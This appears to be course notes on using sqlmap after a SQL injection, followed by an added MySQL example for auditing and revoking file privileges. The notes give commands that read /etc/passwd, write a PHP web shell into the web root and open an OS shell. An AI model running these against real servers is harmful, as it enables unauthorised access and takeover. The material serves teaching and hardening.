File Read
To read files, the DB user must have the privileges to LOAD DATA and INSERT.
Most likely, we will need DBA privileges to read data.
To check for DBA privileges, we use the --is-dba switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
...SNIP...
current user is DBA: True
[*] ending @ 17:31:56 /2020-11-19
We can read files using the --file-read option:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
File Write
Most of the time, we won’t be able to write a file.
We need DBA privileges to be able to write files.
We can write files as such:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
OS Command Execution
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell
If we know the type of SQL injection, we can specify it using the --technique switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
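The privilege requirement described under File Read and File Write can be audited and removed from the database side. The following is an added example, not part of the original notes; it assumes a MySQL 8.0 server, and the account 'webapp'@'localhost' and schema appdb are hypothetical names.

```sql
-- Added example: assumes MySQL 8.0; 'webapp'@'localhost' and appdb are hypothetical.

-- 1. List accounts holding the global FILE privilege (needed for server-side
--    LOAD DATA INFILE and for writing query results to disk) or SUPER.
SELECT user, host, File_priv, Super_priv
FROM mysql.user
WHERE File_priv = 'Y' OR Super_priv = 'Y';

-- 2. The same view through information_schema, readable without access to
--    the mysql system schema.
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE privilege_type IN ('FILE', 'SUPER');

-- 3. Check where the server may import/export files.
--    Empty value = any path, a directory = only that directory,
--    NULL = import and export are disabled.
--    The variable is read-only at runtime; it is set under [mysqld] in the
--    server configuration file and needs a restart to change.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 4. Inspect what the web application's account is allowed to do.
SHOW GRANTS FOR 'webapp'@'localhost';

-- 5. Remove file access from the application account and keep only the
--    table-level rights it needs on its own schema.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'webapp'@'localhost';

-- 6. Verify: the application account should no longer be listed.
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y';
```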